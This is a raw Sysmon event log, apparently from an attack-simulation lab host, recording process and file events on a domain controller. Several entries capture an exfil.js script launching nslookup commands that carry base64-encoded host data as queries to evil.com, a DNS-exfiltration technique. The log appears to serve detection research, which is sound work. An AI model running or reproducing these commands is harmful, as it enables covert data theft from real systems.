14:21:28.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.559{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2A43-000000005F02}2172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.559{2E1864BB-18E0-629A-6742-000000005F02}39763336C:\Windows\System32\WScript.exe{2E1864BB-18E8-629A-2A43-000000005F02}2172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.559{2E1864BB-18E8-629A-2A43-000000005F02}2172C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbml.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000207814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000207805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.528{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltgxobw.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.512{2E1864BB-18E8-629A-2843-000000005F02}6180924C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-2943-000000005F02}2900C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.497{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.497{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.497{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.497{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.497{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2943-000000005F02}2900C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.497{2E1864BB-18E8-629A-2743-000000005F02}78887464C:\Windows\system32\cmd.exe{2E1864BB-18E8-629A-2943-000000005F02}2900C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.510{2E1864BB-18E8-629A-2943-000000005F02}2900C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E8-629A-2743-000000005F02}7888C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltgxobw.tmp 2>&1 10341000x8000000000000000207796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.481{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-2843-000000005F02}6180C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.481{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-2843-000000005F02}6180C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.481{2E1864BB-18E8-629A-2843-000000005F02}6180924C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-2743-000000005F02}7888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.478{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2843-000000005F02}6180C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000207792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.459{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1751FBE0E9C311197C8595D8DA7528D,SHA256=3DF48BBE6F8C3A39D90502785152C63C8A4DB7F496E0AC91C7F9A8DF52AEC35A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 